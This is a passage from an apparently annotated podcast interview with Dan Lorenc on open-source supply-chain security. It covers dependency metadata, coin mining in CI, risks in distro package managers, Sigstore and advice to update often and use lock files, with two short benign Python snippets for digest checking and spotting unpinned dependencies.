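    """Return the hex-encoded SHA-256 digest of the given bytes."""
    return hashlib.sha256(data).hexdigest()


def matches_recorded_digest(artifact: bytes, recorded: str) -> bool:
    """Check that an artifact is byte-for-byte what the recorded digest describes.

    A match only says the artifact is the one that was recorded. It says
    nothing about whether the artifact contains malware or vulnerabilities.
    """
    return hmac.compare_digest(sha256_digest(artifact), recorded.lower())


# Hypothetical build output and the digest recorded alongside it.
built = b"example build output"
recorded = sha256_digest(built)

print(matches_recorded_digest(built, recorded))
print(matches_recorded_digest(built + b" tampered", recorded))
```

A passing check here answers only the "did it come from that build" question, which mirrors the separation between provenance and safety described above.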

[28:57] And then we can start to do the same for maintainers and see who the maintainers are. And if there's only one, then we know that's a problem. But with a lot of the data today, you just can't trust the data at all to even go and start making a lot of these informed decisions. So that's where I'm starting, because I think it makes it harder to attack supply chains and because it starts to unlock a lot of these other types of things you can do when you have all this data.

[29:17] Richard: Going back to Ken Thompson earlier, he installed backdoors to make it easy for him to show that security was bad. Can't we just admit that there's always going to be Bitcoin miners working in my dependency tree and just install a backdoor to have the Bitcoin go to me instead of them? Like, surely that's the better fix. Just admit it's going to be bad. Make sure the badness goes to you.

[29:37] Dan Lorenc: Yeah, attack the attackers. That's a good one. I think in a lot of ways the Bitcoin mining and mining stuff has been a nice occurrence and a boon in a lot of ways. It's the least disruptive way I can think of for an attacker to make a profit off of getting into somebody's infrastructure. Compare it to the ransomware attacks we've seen over the last couple of weeks. I think most people would take Bitcoin mining, which is just burning CPU, over, you know, losing customer data or losing access to your service. So in a lot of ways it's nice that this has happened a little bit. Nobody wants to have coin miners running on their infrastructure. You know, GitHub even had to go and do a whole bunch of work to reduce quotas and everything, and then CI was harder to use for open source projects because people were abusing it with coin mining. So it goes both ways. I think we're going to keep seeing it as long as it's that easy to get arbitrary code execution in people's projects. But I'll take that over a bunch of the other attacks we've seen any day.

[30:25] Richard: Yeah. I think what's scary is that this isn't really fun and games at the end of the day. Like it's interesting, but people have died because people have hacked hospitals and demanded ransom. People have not gotten their chemo because they couldn't get into their systems and didn't know their data. And that's really hard to deal with. That's super stark. I'm glad people like you are out there doing this work. How do you stay sane? I mean, your hair is pretty massive, but like, how do you deal with that pressure?

[30:49] Dan Lorenc: Pressure really, you know, if I don't do anything, then it stays this bad. You know, it's not getting worse. I'm trying to avoid getting one of those Nebraska scenarios, holding everything up myself. And I see it as a whole bunch of small wins we can make every day. So it's kinda nice and motivating that way.

[31:03] Richard: I like that answer. Awesome.

[31:05] Justin: One thing I want to know is what repository or what package manager keeps you up at night? You know, you've got so many different package managers, that's touching pretty much every developer in some way or another. Are there any out there that are like, oh wow, these need attention, or are they getting the attention they need?

[31:28] Dan Lorenc: I think PIP was, I don't want to say it's in a bad state, right? I don't want to blame people. It was something that people didn't realize needed funding over the last year. And I think, you know, through a bunch of different grants and stuff, that has gotten into much better shape, which is great. From a package manager perspective, I think I start to worry more about the kind of OS and distro level ones. The things like apt-get, the things like yum and DNF in the Fedora ecosystem. Most of those were built for actual machines that would install things and update things, pin things and downgrade things.

[31:59] And they were built in a different era, where the keys are distributed in a different way and all this stuff. So they don't support a lot of the declarative installation mechanisms like you can start to do now in PIP and NPM, where you can install fixed versions of things. You lose a lot of metadata when you're doing it those old ways, and they're at the very bottom of most people's container images. So attacking one of those, I think, would be really hard to spot, really hard to recover from, and pretty wide reaching. Thankfully they're run by professionals, in most cases people that take security really seriously, but those are the ones that I do really worry about the most.

[32:32] Justin: Do you think using something along the lines of Sigstore, or upgrading their infrastructure or their backend to support today's standards of security, is something that could be easy to implement, or are they just going to have to, like, think from the ground up again?

[32:50] Dan Lorenc: I hope so. Sigstore is only a couple of months old at this point. We are seeing people start to use it kind of in parallel with package managers, like there are maintainers of WP packages that are signing individual packages with some of our tools. And I hope we get to a point where people can start to use it for those lower level package managers. They've spent years working on their infrastructure, which is great, and we want to make it easy so people don't have to do that again for the next generation of package managers and everything.

[33:15] Richard: So we're running up on time. Before we head out, I just want to say thank you so much. You have so much good advice and you're very eloquent, I think not only in how you talk, but also in how you write. Where can people find you on the internet?

[33:30] Dan Lorenc: Yeah. My Medium page is where most of the stuff I write ends up: dlorenc.medium.com. I think that should get you all of that stuff.

[33:39] Richard: And if you had like a couple of tips for anyone out there, who's using cloud providers at the moment for working for open source projects, what would you say is the easiest way to get their security up a tiny bit?

[33:49] Dan Lorenc: Turn on Dependabot and start updating your dependencies as quickly as possible, and that one's kind of controversial. I'm going to say it anyway. I think, yeah, update as frequently as possible. Take the small version bumps when you can, because it means when there is a CVE found later, it's way easier to update your way out of it than dealing with a year or two's worth of backlog of updating things. That goes against that "if it's not broken, don't fix it" philosophy, which I get. I think when you weigh it out, though, just take the updates and roll with them as they come. That's a big one. And then just pay attention to what's in your dependency tree, write it down somehow. Every language, every package manager is a little bit different, but use lock files. Don't let left-pads break you, that kind of thing, and vendor stuff where you can, use proxies if you have to, depending on the ecosystem. But yeah, insulate yourself as much as possible while taking the updates as fast as possible.
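
The "write it down, use lock files" advice can be sketched as a small check that flags dependencies not pinned to an exact version. This is a minimal illustration, assuming a simplified requirements-style format with one `name==version` entry per line. The function name `unpinned_requirements` and the package names are hypothetical, and real lock files in each ecosystem carry more detail, such as hashes.

```python
def unpinned_requirements(text: str) -> list[str]:
    """Return the entries that are not pinned to an exact version with '=='.

    Assumes a simplified requirements-style format: one entry per line,
    with '#' starting a comment.
    """
    unpinned = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line:
            continue
        if "==" not in line:
            unpinned.append(line)
    return unpinned


# Hypothetical package names, for illustration only.
sample = """
alpha==1.2.3
beta>=2.0   # a range, so the installed version can drift
# a comment line
gamma
"""

print(unpinned_requirements(sample))
```

Anything the check reports is a dependency whose installed version can change without a reviewed update, which is the gap that lock files and automated update pull requests are meant to close.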

[34:35] Richard: Thank you so much, Dan. It's been a real pleasure to talk to you. I really appreciate you coming on the podcast. Everyone, that was Dan Lorenc. If you have any questions for him, he has a Medium article and he may respond to comments. If not, well, I don't know what to do. Maybe his Twitter.

[34:48] Dan Lorenc: Yeah. Twitter works too, @lorenc_dan.

[34:52] Richard: Got it. Thanks.

[34:53] Justin: Thanks.